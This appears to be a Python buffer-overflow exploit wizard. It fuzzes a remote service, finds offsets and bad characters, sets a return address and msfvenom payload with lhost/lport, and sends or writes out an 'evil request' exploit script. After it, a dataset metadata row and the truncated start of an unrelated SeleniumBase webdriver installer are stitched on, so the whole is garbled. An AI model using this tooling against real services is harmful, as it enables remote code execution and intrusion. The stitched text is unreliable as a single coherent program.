def generic_check(user_input):
    """Rejects every input so the prompt keeps looping until the user exits."""
    return False
# -----------------------------------------------------------------------------
# Input handling
# -----------------------------------------------------------------------------
def get_input(check_function):
    """
    Shows a prompt as long as the user has not entered valid input. A check function checks if the user input is valid.
    Built-in commands (exit, help, show ..., set ..., dump) are intercepted here
    and never reach the check function.
    :param check_function: (function) Checks if input is valid
    :return: (string) User input as typed (validation is done on the lower-cased
        value, but the original casing is returned)
    """
    input_ok = False
    user_input = ''
    while not input_ok:
        user_input = input(show_prompt())
        # Print empty line after input
        print()
        # Handle specific user input (global wizard commands)
        if user_input.lower() in ['exit', 'quit']:
            exit(0)
        elif user_input.lower() in ['help', 'show help']:
            show_help()
            continue
        elif user_input.lower() == 'show options':
            show_options()
            continue
        elif user_input.lower() == 'show steps':
            show_steps()
            continue
        elif user_input.lower() == 'show payloads':
            show_payloads()
            continue
        elif user_input.lower() == 'show ascii':
            show_ascii()
            continue
        elif user_input.lower().startswith('set '):
            set_option(user_input)
            continue
        elif user_input.lower() in ['dump', 'dump exploit', 'exploit']:
            if bo_type == 'local':
                dump_local_exploit()
            if bo_type == 'remote':
                dump_remote_exploit()
            continue
        # Check input against the step-specific validator
        input_ok = check_function(user_input.lower())
        if not input_ok:
            # Show message only if user entered something invalid
            if user_input != '':
                print_error('Invalid input. Type help to show available commands.')
    return user_input
def proceed_ok():
    """
    Requires the user to hit Enter to proceed; returns False when 'skip' was entered.
    """
    show_prompt_text('Press Enter to proceed.')
    return get_input(check_enter) == ''
def set_step(value):
    """
    Opens the given wizard step.

    :param value: (int or string) Step number, 0 to 5
    :return: True if the step was opened, False on invalid input
    """
    try:
        number = int(value)
        # Bug fix: the old check `0 < number > 5` only rejected numbers > 5,
        # so negative values silently indexed the steps list from the end.
        if not 0 <= number <= 5:
            raise ValueError
        global current_step
        current_step = number
        steps = [step_fuzzing, step_pattern, step_offsets, step_badchars, step_return, step_payload]
        steps[number]()
        # Bug fix: callers (e.g. the retry loop in step_offsets) test the
        # return value; the old code returned None even on success.
        return True
    except ValueError:
        print_error('Invalid input. You can only select step 0 to 5.')
        return False
def set_command(user_input, command_type):
    """
    Sets the start or end command to the value provided by the user
    :param user_input: (string) Full command, e.g. set command "USER test" or set command b"\\x01\\x02"
    :param command_type: (string) Type of command: 'start' or 'end'
    """
    global start_command
    global end_command
    global pattern_length
    # Everything after 'set <parameter>' is the command value
    value = user_input.split(' ')[2:]
    command = ' '.join(v for v in value)
    # Handle binary input differently: b"..." is treated as \x-escaped hex bytes
    if command.startswith('b"'):
        # NOTE(review): lstrip/rstrip remove *characters*, not prefixes, so a
        # command starting or ending with 'b' or '"' would lose bytes - TODO confirm
        command = command.lstrip('b"')
        command = command.rstrip('"')
        raw = ''.join(c for c in command.split('\\x'))
        if command_type == 'start':
            start_command = unhexlify(raw)
        else:
            end_command = unhexlify(raw)
    else:
        # Plain text command: strip quotes and translate escaped \r \n \t
        command = command.lstrip('"')
        command = command.rstrip('"')
        if command_type == 'start':
            start_command = command.encode().replace(b'\\r', b'\r').replace(b'\\n', b'\n').replace(b'\\t', b'\t')
        else:
            end_command = command.encode().replace(b'\\r', b'\r').replace(b'\\n', b'\n').replace(b'\\t', b'\t')
    # Recalc pattern length
    # NOTE(review): this subtracts the command lengths from the *already
    # adjusted* pattern_length instead of recomputing from the buffer length,
    # so repeated 'set command' calls shrink the pattern further - TODO confirm intent
    pattern_length = pattern_length - len(start_command) - len(end_command)
def set_badchars(user_input):
    """
    Replaces the list of bad characters with the value(s) the user entered.

    :param user_input: full command string, e.g. 'set badchars 00 0a 0d'
    """
    global badchars
    entered = user_input.split(' ')[2:]
    # Keep the existing list object (it is referenced elsewhere) and refill it
    badchars.clear()
    for candidate in entered:
        if not bad_char_valid(candidate):
            print_error('Could not add {} to bad characters: Invalid value'.format(candidate))
            continue
        badchars.append(candidate)
def set_option(user_input):
    """
    Sets a parameter to a given value based on the user input.

    :param user_input: Command with format: set parameter value
    """
    global start_command
    global pattern_length
    global end_command
    text = user_input.split(' ')
    # Bug fix: the old guard `len(text) < 3 and (text[2] != 'command' or
    # text[2] != 'badchars')` evaluated text[2] even when fewer than three
    # tokens were present, raising an IndexError - and the or-ed inequalities
    # were always true anyway.
    if len(text) < 3:
        print_error('Invalid input. Use the following command format to set parameters: set parameter value')
        return
    parameter = text[1]
    value = text[2]
    # Dispatch on the parameter name; each branch validates before assigning
    if parameter == 'step':
        set_step(value)
    elif parameter == 'command':
        set_command(user_input, 'start')
    elif parameter == 'end_command':
        set_command(user_input, 'end')
    elif parameter == 'badchars':
        set_badchars(user_input)
    elif parameter == 'type':
        if bo_type_valid(value):
            global bo_type
            bo_type = value
    elif parameter == 'filename':
        global file_name
        file_name = value
    elif parameter == 'fileext':
        if ext_valid(value):
            global file_ext
            file_ext = value
    elif parameter == 'target':
        if ip_valid(value):
            global target
            target = value
    elif parameter == 'lhost':
        if ip_valid(value):
            global connect_ip
            connect_ip = value
    elif parameter == 'port':
        if port_valid(value):
            global port
            port = value
    elif parameter == 'lport':
        if port_valid(value):
            global connect_port
            connect_port = value
    elif parameter == 'fuzz_length':
        if number_valid(value):
            global fuzz_buff_length
            fuzz_buff_length = int(value)
    elif parameter == 'fuzz_increase':
        if number_valid(value):
            global increase_step
            increase_step = int(value)
    elif parameter == 'fuzz_char':
        if value.isalnum() and len(value) == 1:
            global fuzz_char
            fuzz_char = value.encode()
    elif parameter == 'pattern':
        if number_valid(value):
            # Pattern length excludes the surrounding start/end commands
            pattern_length = int(value) - len(start_command) - len(end_command)
    elif parameter == 'buffer_length':
        if number_valid(value):
            global buf_length
            buf_length = int(value)
    elif parameter == 'offset':
        if number_valid(value):
            global offset
            offset = int(value)
    elif parameter == 'nop_sled':
        if number_valid(value):
            global nop_sled
            nop_sled = int(value)
    elif parameter == 'nop_padding':
        if number_valid(value):
            global nop_padding
            nop_padding = int(value)
    elif parameter == 'return':
        if address_valid(value):
            global return_address
            # Pack the address little-endian, as placed in the buffer
            return_address = struct.pack('<L', int(value, 16))
    elif parameter == 'payload':
        if payload_valid(value):
            global payload
            payload = value
            create_payload()
    elif parameter == 'arch':
        if arch_valid(value):
            global arch
            arch = 'x' + value
    elif parameter == 'platform':
        if platform_valid(value):
            global platform
            platform = value
    else:
        print_error('Invalid parameter')
# -----------------------------------------------------------------------------
# Print options / help
# -----------------------------------------------------------------------------
def show_help():
    """
    Prints all supported commands
    """
    header = ['Command', 'Description']
    rows = [
        ['exit / quit', 'Closes the wizard'],
        ['dump exploit', 'Creates an exploit file based on the current settings'],
        ['help', 'Shows this list with all supported commands'],
        ['set', 'Sets a parameter, examples: set step 3, set target 10.10.10.1'],
        ['show ascii', 'Shows all ASCII characters that are currently allowed in this exploit'],
        ['show options', 'Shows which values are currently set for all parameters'],
        ['show payloads',
         'Shows all possible Metasploit payloads based on your settings for platform and architecture'],
        ['show steps', 'Shows all wizard steps and highlights the current step']
    ]
    row_format = '{:<15s}{:s}'
    # Header in bold gray, underlined by a dashed line
    print(BOLD, GRAY)
    print(row_format.format(header[0], header[1]))
    print('-' * 77, FORMAT_END)
    for row in rows:
        print(row_format.format(row[0], row[1]))
    print('\n')
def show_options():
    """
    Prints the currently set values of all parameters, grouped by topic.
    Each desc_* helper returns [name, current value, required flag, description].
    """
    dash = '-' * 77
    header = ['Name', 'Current setting', 'Required', 'Description']
    # Each group starts with a one-element list holding the group title
    options = [
        [
            ['Global parameters'],
            desc_bo_type(),
            desc_start_command(),
            desc_end_command()
        ],
        [
            ['Local buffer overflow parameters'],
            desc_file_name(),
            desc_file_ext()
        ],
        [
            ['Remote buffer overflow parameters'],
            desc_target(),
            desc_port()
        ],
        [
            ['Fuzzing'],
            desc_fuzz_buff_length(),
            desc_increase_step(),
            desc_fuzz_char()
        ],
        [
            ['Buffer'],
            desc_pattern(),
            desc_buf_length(),
            desc_offset(),
            desc_badchars(),
            desc_nop_sled(),
            desc_nop_padding(),
            desc_return_address()
        ],
        [
            ['Payload'],
            desc_payload(),
            desc_arch(),
            desc_platform(),
            desc_connect_ip(),
            desc_connect_port()
        ]
    ]
    # Header
    print(BOLD, GRAY)
    print('{:<15s}{:<20}{:<15s}{:<30s}'.format(header[0], header[1], header[2], header[3]))
    print(dash, FORMAT_END)
    # Parameters (index 0 of each group is its title)
    for item in options:
        for index, value in enumerate(item):
            if index == 0:
                print(BOLD, GRAY)
                print(value[0].upper(), FORMAT_END)
            else:
                print('{:<15s}{:<20}{:<15s}{:<30s}'.format(value[0], value[1], value[2], value[3]))
    print('\n')
def show_settings(settings):
    """
    Shows a table of parameters together with their currently set values.

    :param settings: List of parameter descriptions (name, value, required, text)
    """
    name, value, text = 'Parameter', 'Current setting', 'Description'
    print(f'{BOLD}{GRAY}{name:<15s}{value:<20}{text:<30s}{FORMAT_END}')
    # item[2] (the 'required' flag) is deliberately not displayed here
    for item in settings:
        print(f'{GRAY}{item[0]:<15s}{item[1]:<20}{item[3]:<30s}{FORMAT_END}')
    print(f'\nIf you wish to change these settings, enter {BOLD}set <parameter> <value>{FORMAT_END}\n')
def show_steps():
    """
    Displays all steps of the wizard and marks the currently selected step
    """
    print('\nThe wizard guides you through the following steps:')
    titles = ['Fuzzing',
              'Send pattern to find offset for EIP',
              'Check offsets',
              'Check bad characters',
              'Check return address',
              'Create payload']
    for number, title in enumerate(titles):
        # The active step is highlighted in cyan with an arrow marker
        if number == current_step:
            print('{}=>[{}] {} {}'.format(CYAN, number, title, FORMAT_END))
        else:
            print('{}  [{}] {} {}'.format(GRAY, number, title, FORMAT_END))
    print('The prompt shows your current step.')
    print('You can switch between steps at any time with {}set step <number>{}\n'.format(BOLD, FORMAT_END))
def show_payloads():
    """
    Shows all payloads available in Metasploit based on the current values for architecture and platform
    """
    tmp_file = 'payloads.txt'
    command = 'msfvenom -l payloads > {}'.format(tmp_file)
    thread = call_command(command)
    while thread.running():
        animation('Searching payloads in msfvenom')
    # Only parse the list if msfvenom exited cleanly
    if thread.result() == 0:
        print()
        with open(tmp_file, 'r') as f:
            for line in f:
                # Payload name sits in the 5th space-separated column of msfvenom's table
                splitted = line.split(' ')
                if len(splitted) > 5:
                    name = splitted[4]
                    if platform in name:
                        # Filter by architecture: x86 payloads carry no marker,
                        # x64 payloads contain 'x64' in the name
                        if arch == 'x86' and 'x64' not in name:
                            print(name)
                        elif arch == 'x64' and 'x86' not in name:
                            print(name)
        os.unlink(tmp_file)
def show_ascii():
    """
    Prints the remaining allowed characters as a 16-column hex matrix
    (helps spotting bad characters).
    """
    pairs = [char_string[i:i + 1].hex() for i in range(len(char_string))]
    rows = []
    for start in range(0, len(pairs), 16):
        rows.append(' '.join(pairs[start:start + 16]))
    print('\n')
    print('\n'.join(rows))
# -----------------------------------------------------------------------------
# Print formatting
# -----------------------------------------------------------------------------
# Print formatted output to the console
# -----------------------------------------------------------------------------
def print_message(type, message):
    """
    Prints *message* with the colour and sign that belong to *type*
    ('error', 'success', 'warning' or 'info'). Multi-line messages get the
    sign on the first line and indented continuation lines.
    """
    spec = {
        'error': {'color': RED, 'sign': '!'},
        'success': {'color': GREEN, 'sign': '*'},
        'warning': {'color': YELLOW, 'sign': '!'},
        'info': {'color': GRAY, 'sign': 'i'}
    }[type]
    color, sign = spec['color'], spec['sign']
    lines = message.split('\n')
    # One line message: sign, text and closing format code together
    if len(lines) == 1:
        print("{}[{}] {}{}".format(color, sign, lines[0], FORMAT_END))
        return
    # Multi-line message: close the colour code only on the last line
    last = len(lines) - 1
    for i, line in enumerate(lines):
        if i == 0:
            print("{}[{}] {}".format(color, sign, line))
        elif i == last:
            print("    {}{}".format(line, FORMAT_END))
        else:
            print("    {}".format(line))
def print_error(message):
    """Print *message* formatted as an error."""
    print_message('error', message)
def print_success(message):
    """Print *message* formatted as a success notice."""
    print_message('success', message)
def print_warning(message):
    """Print *message* formatted as a warning."""
    print_message('warning', message)
def print_info(message):
    """Print *message* formatted as an informational note."""
    print_message('info', message)
def show_prompt():
    """Builds the input prompt; once a step is active it shows type and step number."""
    if current_step < 0:
        return '\n{}wizard >{} '.format(BLUE_BACK, BACK_END)
    return '\n{}wizard ({} | {}) >{} '.format(BLUE_BACK, bo_type, current_step, BACK_END)
def show_prompt_text(text, show_lines=True):
    """Prints *text* wrapped to 80 columns, indented to line up with the prompt."""
    prompt_len = len(show_prompt()) - len(BLUE_BACK) - len(BACK_END)
    for line in textwrap.wrap(text, width=80):
        if show_lines:
            print(' ' * (prompt_len - 6), '░▒▓', line)
        else:
            print(' ' * (prompt_len - 2), line)
def show_step_banner(title):
    """Prints a yellow banner announcing the given wizard step title."""
    rule = '~' * 60
    print(YELLOW)
    print(rule)
    print(' ' + title)
    print(rule)
    print(FORMAT_END)
# -----------------------------------------------------------------------------
# Threading
# -----------------------------------------------------------------------------
def animation(name):
    """Renders one cycle of a spinner while a background task is running."""
    for frame in "/—\\|":
        sys.stdout.write('\r' + name + ' in progress... ' + frame)
        time.sleep(.1)
        sys.stdout.flush()
def threadpool(f, executor=None):
    """
    Decorator that submits calls of the wrapped function to a thread pool.
    :param f: (function) Function to run asynchronously
    :param executor: Optional concurrent.futures executor; falls back to the
        module-level _DEFAULT_POOL when omitted
    :return: (function) Wrapper returning a Future (callers poll .running()/.result())
    """
    def wrap(*args, **kwargs):
        # Submit and return the Future instead of blocking on the call
        return (executor or _DEFAULT_POOL).submit(f, *args, **kwargs)
    return wrap
@threadpool
def call_command(command):
    """
    Runs *command* in a shell on the thread pool (via @threadpool), discarding output.
    NOTE(review): shell=True with interpolated data is injection-prone; callers
    quote user input with shlex.quote where needed.
    :return: Future resolving to the shell exit status (0 = success)
    """
    status = sub.call(command, stdout=sub.DEVNULL, stderr=sub.DEVNULL, shell=True)
    return status
# -----------------------------------------------------------------------------
# Send and dump exploit
# -----------------------------------------------------------------------------
def run_remote_exploit():
    """
    Asks the user whether the wizard should send the remote exploit itself;
    entering 'skip' leaves it to the user.
    """
    show_prompt_text('You can check and run the exploit file manually or press Enter to let the wizard run it.')
    show_prompt_text('Enter "skip" to proceed without running the file.', False)
    if get_input(check_text) != 'skip':
        send_exploit()
def send_exploit():
    """
    Sends a request with the payload for a remote buffer overflow.
    Connects to the globally configured target/port and sends the current buffer.
    """
    try:
        with so.socket(so.AF_INET, so.SOCK_STREAM) as s:
            s.settimeout(5)
            print_info('Connecting to {}'.format(target))
            connect = s.connect_ex((target, port))
            # Stop if connection cannot be established
            if connect != 0:
                print_error('Connection failed')
                return
            # Connection established: send request
            try:
                # Catch initial response if any (e.g. a service banner)
                try:
                    print('[*] Received response: ' + str(s.recv(1024)))
                except so.timeout:
                    pass
                print_info('Sending evil request with {} bytes'.format(len(buffer)))
                s.send(buffer)
                print_success('Done')
            # Stop on timeout
            except so.timeout:
                print_error('Connection failed due to socket timeout')
    # A crash of the target while sending is expected and reported, not raised
    except (BrokenPipeError, ConnectionResetError):
        print_error('The connection was closed while sending the payload')
def run_remote_fuzzing():
    """
    Asks the user whether the wizard should run the remote fuzzing itself;
    entering 'skip' leaves it to the user.
    """
    show_prompt_text('You can check and run the fuzzing file manually or press Enter to let the wizard run it.')
    show_prompt_text('Enter "skip" to proceed without running the file.', False)
    if get_input(check_text) == 'skip':
        return
    send_fuzzing()
    print_info('Fuzzing finished')
def send_fuzzing():
    """
    Sends requests with increasing payloads to cause a remote buffer overflow.
    A fresh connection is opened for each fuzzing payload.
    """
    build_fuzz_buffer()
    try:
        for item in fuzz_buffer:
            with so.socket(so.AF_INET, so.SOCK_STREAM) as s:
                s.settimeout(5)
                print_info('Connecting to ' + target)
                connect = s.connect_ex((target, port))
                # Stop if connection cannot be established
                if connect != 0:
                    print_error('Connection failed')
                    return
                # Connection established: send request
                try:
                    # Catch initial response if any (e.g. a service banner)
                    try:
                        print('[*] Received response: ' + str(s.recv(1024)))
                    except so.timeout:
                        pass
                    # Payload is wrapped in the configured start/end commands
                    command = start_command + item + end_command
                    print_info('Fuzzing with {} bytes'.format(len(command)))
                    s.send(command)
                    try:
                        print('[*] Received response: ' + str(s.recv(1024)))
                    except so.timeout:
                        pass
                    print_success('Done')
                # Stop on timeout
                except so.timeout:
                    print_error('Connection failed due to socket timeout.')
                    return
    # A crash of the target service is the expected fuzzing outcome
    except (BrokenPipeError, ConnectionResetError):
        print_error('The connection was closed while sending the payload')
def dump_local_exploit():
    """
    Creates a file with the payload for a local buffer overflow.
    Uses the globally configured file name and the current buffer.
    """
    global file
    global buffer
    try:
        with open(file, 'wb') as out:
            out.write(buffer)
    except OSError as ex:
        print_error('Error while creating the exploit file:\n  {}'.format(ex.strerror))
    else:
        print_success('Created / modified file with length {}'.format(len(buffer)))
def dump_remote_exploit():
    """
    Writes a standalone python exploit script based on the currently set parameters.
    The generated script connects to target:port and sends the current buffer.
    """
    global file
    # Template for the generated script; {buffer_code} is filled with the
    # selected buffer's python source representation
    content = """\
#!/usr/bin/python3
import socket as so

# --- Define target ------------------------
target = '{target}'
port = {port}
# ------------------------------------------

# --- Define exploit ------------------------
buf_length = {buffer_length}
offset = {off}
{buffer_code}
# ------------------------------------------

with so.socket(so.AF_INET, so.SOCK_STREAM) as s:
    try:
        s.settimeout(5)
        print(' [*] Connecting to', target)
        connect = s.connect_ex((target, port))
        # Stop script if connection cannot be established
        if connect != 0:
            print('[!] Connection failed')
            exit(1)
        # Connection established: send request
        try:
            # Catch initial response if any
            try:
                print('[*] Received response: ' + str(s.recv(1024)))
            except so.timeout:
                pass
            print(' [*] Sending evil request with', len(buffer), 'bytes')
            s.send(buffer)
            print('[*] Done')
        # Stop on timeout
        except so.timeout:
            print('[!] Connection failed due to socket timeout.')
            exit(1)
    except (BrokenPipeError, ConnectionResetError):
        print('[!] The connection was closed while sending the payload')
""".format(target=target,
           port=port,
           buffer_length=buf_length,
           off=offset,
           buffer_code=buffer_list.selected_buffer.print_buffer())
    try:
        with open(file, 'wb') as f:
            f.write(content.encode())
        print_success('Created exploit file {}'.format(file))
    except OSError as ex:
        print_error('Error while creating the exploit file:\n  {}'.format(ex.strerror))
def update_remote_exploit():
    """
    Updates only the buffer in an existing exploit file.
    Manual changes in other parts of the file will be retained.
    """
    try:
        # FileInput with inplace=True redirects print() into the file,
        # so each printed line replaces the original line
        with FileInput(files=[file], inplace=True) as f:
            for line in f:
                line = line.rstrip()
                if line.startswith('offset = '):
                    line = "offset = " + str(offset)
                elif line.startswith('buffer = '):
                    # Replace the whole buffer definition with the current one
                    line = buffer_list.selected_buffer.print_buffer()
                elif line.startswith('buffer += ') or len(line) == 0:
                    # Drop old continuation lines; print_buffer() re-emits them
                    continue
                print(line)
        print_success('Updated buffer in exploit file {}'.format(file))
    except OSError as ex:
        print_error('Error while updating the exploit file:\n  {}'.format(ex.strerror))
def build_fuzz_buffer():
    """
    Generates the buffer for fuzzing based on the currently set parameters for
    fuzz_length, fuzz_increase and fuzz_char.
    Each entry grows by increase_step bytes; the start/end command lengths are
    subtracted so the total sent request hits the intended sizes.
    """
    counter = increase_step - len(start_command) - len(end_command)
    # NOTE(review): fuzz_buff_length is used here as the *number* of payloads
    # to generate, while its description elsewhere suggests a byte length -
    # TODO confirm the intended semantics
    while len(fuzz_buffer) <= fuzz_buff_length:
        fuzz_buffer.append(fuzz_char * counter)
        counter = counter + increase_step
def dump_local_fuzz():
    """
    Writes one fuzzing file per payload, with the payload length in the file name.
    """
    build_fuzz_buffer()
    # Create files
    for payload_bytes in fuzz_buffer:
        out_name = '{}_{}.{}'.format(file_name, len(payload_bytes), file_ext)
        with open(out_name, 'wb') as out:
            out.write(start_command + payload_bytes + end_command)
        print_info('Created fuzzing file with length ' + str(len(payload_bytes)))
def dump_remote_fuzz():
    """
    Writes a standalone python fuzzing script based on the currently set
    parameters for fuzz_length, fuzz_increase and fuzz_char.
    """
    filename = 'fuzzing.py'
    # Template for the generated script; values are baked in via format()
    content = '''\
#!/usr/bin/python3
import socket as so

# --- Define target ------------------------
target = '{target}'
port = {port}
# ------------------------------------------

# --- Build fuzzing buffer -----------------
fuzz_buffer = []
counter = {step} - len({cmd}) - len({ecmd})
while len(fuzz_buffer) <= {buff_len}:
    fuzz_buffer.append({char}*counter)
    counter = counter + {step}
# ------------------------------------------

for item in fuzz_buffer:
    with so.socket(so.AF_INET, so.SOCK_STREAM) as s:
        try:
            s.settimeout(5)
            print(' [*] Connecting to', target)
            connect = s.connect_ex((target, port))
            # Stop script if connection cannot be established
            if connect != 0:
                print('[!] Connection failed')
                exit(1)
            # Connection established: send request
            try:
                # Catch initial response if any
                try:
                    print('[*] Received response: ' + str(s.recv(1024)))
                except so.timeout:
                    pass
                command = {cmd} + item + {ecmd}
                print(' [*] Fuzzing with', len(command), 'bytes')
                s.send(command)
                try:
                    print('[*] Received response: ' + str(s.recv(1024)))
                except so.timeout:
                    pass
                print('[*] Done')
            # Stop on timeout
            except so.timeout:
                print('[!] Connection failed due to socket timeout.')
                exit(1)
        except (BrokenPipeError, ConnectionResetError):
            print('[!] The connection was closed while sending the payload')
            exit(1)
'''.format(target=target,
           port=port,
           step=increase_step,
           buff_len=fuzz_buff_length,
           char=fuzz_char,
           cmd=start_command,
           ecmd=end_command)
    try:
        with open(filename, 'w') as f:
            f.write(content)
        print_success('Created fuzzing file {}'.format(filename))
    except OSError as ex:
        print_error('Error while creating the fuzzing file:\n  {}'.format(ex.strerror))
###############################################################################
# Start wizard
###############################################################################
if __name__ == '__main__':
    # check_dependencies, print_welcome, show_steps, show_prompt_text,
    # get_input etc. are defined earlier in this script.
    if not check_dependencies():
        exit(1)
    # Intro
    print_welcome()
    show_steps()
    # Walk through steps or let user work freely
    show_prompt_text(
        'Enter {}start{} to walk through the wizard step by step or make your settings manually.'.format(BOLD,
                                                                                                         FORMAT_END))
    show_prompt_text('Enter {}show help{} to get help.'.format(BOLD, FORMAT_END))
    start_input = get_input(intro_valid)
    if start_input == 'start':
        select_bo_type()
        # Walk through steps
        start_steps()
    else:
        # Show prompt till exit (get_input loops until the user quits)
        get_input(generic_check)
| 30.59147
| 154
| 0.652988
|
4a112b5c42be07dc5596f4fc5c0af76bbb7e2cf5
| 21,837
|
py
|
Python
|
seleniumbase/console_scripts/sb_install.py
|
gourav-iquanti/SeleniumBase
|
420b6cc7b843f85e6efdc3eb90943b356e11b355
|
[
"MIT"
] | null | null | null |
seleniumbase/console_scripts/sb_install.py
|
gourav-iquanti/SeleniumBase
|
420b6cc7b843f85e6efdc3eb90943b356e11b355
|
[
"MIT"
] | null | null | null |
seleniumbase/console_scripts/sb_install.py
|
gourav-iquanti/SeleniumBase
|
420b6cc7b843f85e6efdc3eb90943b356e11b355
|
[
"MIT"
] | null | null | null |
"""
Installs the specified web driver.
Usage:
seleniumbase install {chromedriver|geckodriver|edgedriver|
iedriver|operadriver} [OPTIONS]
Options:
VERSION Specify the version.
(Default chromedriver version = 2.44)
Use "latest" for the latest version.
-p OR --path Also copy the driver to /usr/local/bin
Example:
seleniumbase install chromedriver
seleniumbase install geckodriver
seleniumbase install edgedriver
seleniumbase install chromedriver 83.0.4103.39
seleniumbase install chromedriver latest
seleniumbase install chromedriver -p
seleniumbase install chromedriver latest -p
seleniumbase install edgedriver 79.0.309.65
Output:
Installs the chosen webdriver to seleniumbase/drivers/
(chromedriver is required for Chrome automation)
(geckodriver is required for Firefox automation)
(edgedriver is required for MS Edge automation)
(iedriver is required for Internet Explorer automation)
(operadriver is required for Opera Browser automation)
"""
import os
import platform
import requests
import shutil
import sys
import tarfile
import urllib3
import zipfile
from seleniumbase import drivers # webdriver storage folder for SeleniumBase
urllib3.disable_warnings()
DRIVER_DIR = os.path.dirname(os.path.realpath(drivers.__file__))
LOCAL_PATH = "/usr/local/bin/" # On Mac and Linux systems
DEFAULT_CHROMEDRIVER_VERSION = "2.44"
DEFAULT_GECKODRIVER_VERSION = "v0.26.0"
DEFAULT_EDGEDRIVER_VERSION = "84.0.522.52"
DEFAULT_OPERADRIVER_VERSION = "v.81.0.4044.113"
def invalid_run_command():
    """Abort with an Exception that explains correct `seleniumbase install` usage."""
    usage_parts = (
        " ** install **\n\n",
        "  Usage:\n",
        "           seleniumbase install [DRIVER_NAME] [OPTIONS]\n",
        "                 (Drivers: chromedriver, geckodriver, edgedriver,\n",
        "                           iedriver, operadriver)\n",
        "  Options:\n",
        "           VERSION         Specify the version.\n",
        "                           (Default chromedriver version = 2.44)\n",
        '                           Use "latest" for the latest version.\n',
        "           -p OR --path    Also copy the driver to /usr/local/bin\n",
        "  Example:\n",
        "           seleniumbase install chromedriver\n",
        "           seleniumbase install geckodriver\n",
        "           seleniumbase install chromedriver 76.0.3809.126\n",
        "           seleniumbase install chromedriver latest\n",
        "           seleniumbase install chromedriver -p\n",
        "           seleniumbase install chromedriver latest -p\n",
        "  Output:\n",
        "        Installs the chosen webdriver to seleniumbase/drivers/\n",
        "        (chromedriver is required for Chrome automation)\n",
        "        (geckodriver is required for Firefox automation)\n",
        "        (edgedriver is required for Microsoft Edge automation)\n",
        "        (iedriver is required for InternetExplorer automation)\n",
        "        (operadriver is required for Opera Browser automation)\n",
    )
    print("")
    raise Exception('INVALID RUN COMMAND!\n\n%s' % "".join(usage_parts))
def make_executable(file_path):
    """Grant execute permission wherever read permission already exists.

    Implements the rule "If you can read it, you can execute it" by copying
    the read bits (owner/group/other) onto the corresponding execute bits.
    """
    current_mode = os.stat(file_path).st_mode
    read_bits = current_mode & 0o444
    os.chmod(file_path, current_mode | (read_bits >> 2))
def main(override=None):
    """Download and install the requested webdriver into seleniumbase/drivers/.

    Parses sys.argv as: entry point, "install", driver name, optional version,
    optional -p/--path flag. Requires network access for the download.

    Fix: the edgedriver branch previously raised "Operadriver missing from
    Zip file!" although it validates msedgedriver.exe; the message now names
    the right driver.

    :param override: optional driver name ("chromedriver", "edgedriver" or
                     "geckodriver"); when given, sys.argv is replaced so the
                     default version of that driver gets installed.
    :raises Exception: on invalid arguments, unsupported platforms, failed
                       downloads or unexpected archive contents.
    """
    if override == "chromedriver":
        sys.argv = ["seleniumbase", "install", "chromedriver"]
    elif override == "edgedriver":
        sys.argv = ["seleniumbase", "install", "edgedriver"]
    elif override == "geckodriver":
        sys.argv = ["seleniumbase", "install", "geckodriver"]
    num_args = len(sys.argv)
    # Only accept invocation through the "seleniumbase" / "sbase" entry points.
    if sys.argv[0].split('/')[-1].lower() == "seleniumbase" or (
            sys.argv[0].split('\\')[-1].lower() == "seleniumbase") or (
            sys.argv[0].split('/')[-1].lower() == "sbase") or (
            sys.argv[0].split('\\')[-1].lower() == "sbase"):
        if num_args < 3 or num_args > 5:
            invalid_run_command()
    else:
        invalid_run_command()
    name = sys.argv[2].lower()
    file_name = None
    download_url = None
    downloads_folder = DRIVER_DIR
    sys_plat = sys.platform
    expected_contents = None
    platform_code = None
    inner_folder = None
    copy_to_path = False
    use_version = ""
    new_file = ""
    f_name = ""
    if name == "chromedriver":
        use_version = DEFAULT_CHROMEDRIVER_VERSION
        get_latest = False
        if num_args == 4 or num_args == 5:
            if "-p" not in sys.argv[3].lower():
                use_version = sys.argv[3]
                if use_version.lower() == "latest":
                    get_latest = True
            else:
                copy_to_path = True
        if num_args == 5:
            if "-p" in sys.argv[4].lower():
                copy_to_path = True
            else:
                invalid_run_command()
        if "darwin" in sys_plat:
            file_name = "chromedriver_mac64.zip"
        elif "linux" in sys_plat:
            file_name = "chromedriver_linux64.zip"
        elif "win32" in sys_plat or "win64" in sys_plat or "x64" in sys_plat:
            file_name = "chromedriver_win32.zip"  # Works for win32 / win_x64
        else:
            raise Exception("Cannot determine which version of chromedriver "
                            "to download!")
        found_chromedriver = False
        if get_latest:
            # Resolve "latest" through the chromedriver storage API.
            last = "http://chromedriver.storage.googleapis.com/LATEST_RELEASE"
            url_request = requests.get(last)
            if url_request.ok:
                found_chromedriver = True
                use_version = url_request.text
        download_url = ("http://chromedriver.storage.googleapis.com/"
                        "%s/%s" % (use_version, file_name))
        url_request = None
        if not found_chromedriver:
            # Probe the URL so a bad version number fails with a clear error.
            url_request = requests.get(download_url)
        if found_chromedriver or url_request.ok:
            print("\n* chromedriver version for download = %s" % use_version)
        else:
            raise Exception("Could not find chromedriver to download!\n")
    elif name == "geckodriver" or name == "firefoxdriver":
        use_version = DEFAULT_GECKODRIVER_VERSION
        if "win32" in sys_plat or "win64" in sys_plat or "x64" in sys_plat:
            use_version = "v0.24.0"
        found_geckodriver = False
        if num_args == 4 or num_args == 5:
            if "-p" not in sys.argv[3].lower():
                use_version = sys.argv[3]
                if use_version.lower() == "latest":
                    # Resolve "latest" through the GitHub releases API.
                    last = ("https://api.github.com/repos/"
                            "mozilla/geckodriver/releases/latest")
                    url_request = requests.get(last)
                    if url_request.ok:
                        found_geckodriver = True
                        use_version = url_request.json()["tag_name"]
                    else:
                        use_version = DEFAULT_GECKODRIVER_VERSION
            else:
                copy_to_path = True
        if num_args == 5:
            if "-p" in sys.argv[4].lower():
                copy_to_path = True
            else:
                invalid_run_command()
        if "darwin" in sys_plat:
            file_name = "geckodriver-%s-macos.tar.gz" % use_version
        elif "linux" in sys_plat:
            arch = platform.architecture()[0]
            if "64" in arch:
                file_name = "geckodriver-%s-linux64.tar.gz" % use_version
            else:
                file_name = "geckodriver-%s-linux32.tar.gz" % use_version
        elif "win32" in sys_plat or "win64" in sys_plat or "x64" in sys_plat:
            file_name = "geckodriver-%s-win64.zip" % use_version
        else:
            raise Exception("Cannot determine which version of geckodriver "
                            "(Firefox Driver) to download!")
        download_url = ("https://github.com/mozilla/geckodriver/"
                        "releases/download/"
                        "%s/%s" % (use_version, file_name))
        url_request = None
        if not found_geckodriver:
            url_request = requests.get(download_url)
        if found_geckodriver or url_request.ok:
            print("\n* geckodriver version for download = %s" % use_version)
        else:
